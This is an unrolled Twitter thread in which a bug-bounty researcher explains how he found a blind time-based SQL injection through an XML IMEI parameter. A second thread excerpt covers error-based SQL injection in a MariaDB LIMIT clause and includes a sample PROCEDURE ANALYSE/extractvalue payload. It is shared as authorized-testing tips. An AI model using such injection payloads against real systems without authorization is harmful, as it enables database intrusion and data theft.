Share this page!

Mustafa Can İPEKÇİ Profile picture
Twitter logo
Apr 20 8 tweets 2 min read
As of today I passed half million milestone on @SynackRedTeam with 200k of it on last 90 days. So far this month about to catch previous one too, we will see what is going to happen in next 10 days :). #bugbounty #bugbountytips ImageImage
Almost all my bugs this month was SQLis again. I'll try to give another example from the unique ones.
One of the targets was having SQLi on some weird endpoint. It was expecting XML data but looks like it was looking for "xml" as parameter.
I started to send some XML data via it. Application was giving error the each tag I used but for one of them it gave not string couldn't be parsed error.
After then I started to fuzz for attributes and find out IMEI was looked one, however any value I tried was giving error again for Invalid IMEI value.
I looked around on the web and located some data send for the target app and used the IMEI value from there. Application stopped giving error but looks like it was vulnerable to SQL on the same param.
What it looked like developer was parsing first 15 characters and checking if it was valid IMEI then processing entire payload.
However this was full blind SQLi so, used time based payloads and able to extract data. I hope this will be helpful for all others to and showing do not give up on the target.

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Mustafa Can İPEKÇİ

Mustafa Can İPEKÇİ Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @mcipekci

Mustafa Can İPEKÇİ Profile picture
Feb 26
On recent engagements to the on program on @SynackRedTeam, I find out that target had error based SQL injection on LIMIT clause, it appears that DBMS was MariaDB 10.4.13 so it was limiting options to be used on the injection. #bugbountytips #bugbounty 1/5
Only way to exploit the vulnerability was using PROCEDURE ANALYSE on the injection point. However we were not able to use subqueries inside analyse because it's not allowed. So our options were limited to fetch stuff like database(), user() etc. 2/5
Payload for injection was like this 1+procedure+analyse(extractvalue(rand(),version()),1). However this will only allow us to retrieve version of the DBMS, then I started to check which other functions are available to use with in permissions of the current user. 3/5
Read 6 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(